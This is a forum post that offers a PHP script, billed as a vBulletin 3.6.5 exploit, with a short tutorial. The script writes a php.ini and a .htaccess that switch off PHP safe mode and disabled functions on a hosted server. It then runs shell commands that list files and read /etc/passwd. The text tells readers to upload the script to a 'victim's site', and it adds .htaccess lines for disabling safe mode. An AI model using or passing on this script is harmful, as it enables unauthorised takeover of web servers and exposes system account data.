Hello! Now bring an exploit to exploit a vulnerability in vBulletin 3.6.5!
Kod:
*/
echo "[+] Start...\n";
$bypfile=fopen('php.ini','w+');
$stuffile=fopen('.htaccess','w+');
if($bypfile and $stuffile!= NULL){
echo "[+] evil files created succes ! \n";
}
else{
echo "[-] access denial ! \n";
}
$byprullz1="safe_mode = OFF
";
$byprullz2="disable_functions = NONE";
$dj=fwrite($bypfile,$byprullz1);
$dj1=fwrite($bypfile,$byprullz2);
fclose($bypfile);
if($dj and $dj1!= NULL){
echo "[+] php.ini writed \n";
}
else{
echo "[-] 404 php.ini not found !\n";
}
$breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this '/home/user/public_html' by ur path
$sf7=fwrite($stuffile,$breakrullz);
fclose($stuffile);
if($sf7!= NULL){
echo "[+] evil .htaccess writing...done\n";
echo "[+] exploited by success!\n\n\n";
echo "\t\t\t[+] programmed by SkarY\n";
echo "\t\t\t[+] home : skaryhaxerror.blogspot.com\n";
echo "\t\t\t[+] Greetz : My Friends and Anti-Armenia.org ..\n";
}
else{
echo "[-] evil .htaccess Not found!\n";
}
system("pwd;ls -lia;uname -a;cat /etc/passwd");
#EOF
?>
--------------------------------------------
Not my shell but very useful.
quick tut on how to make safe-mode off.
--------------------------------------------
Now open the Script with notePad and press Ctrl+F and look for the ” ConfigPath ” without quotes.
Now replace the /home/user/public_html/php.ini”; // replace this ‘/home/user/public_html’ by your own site path.
Now save it and upload it in your victim’s site and open it .
Boom automatically it will create the files and The Safe Mode will turn into Safe Mode Off
--------------------------------------------
Or do what i do here :
--------------
Put this line inside .htaccess file to turn it OFF:
php_value safe_mode off
IF ABOVE DOESN'T WORK, THEN:
php_flag safe_mode off
ALSO try substituting the "off" word with: 0
Eg: php_value safe_mode 1
Upload it on your shell or your website filemanager ;)
-----------------
ENJOR AND GOOD LUCK!
Thank's!
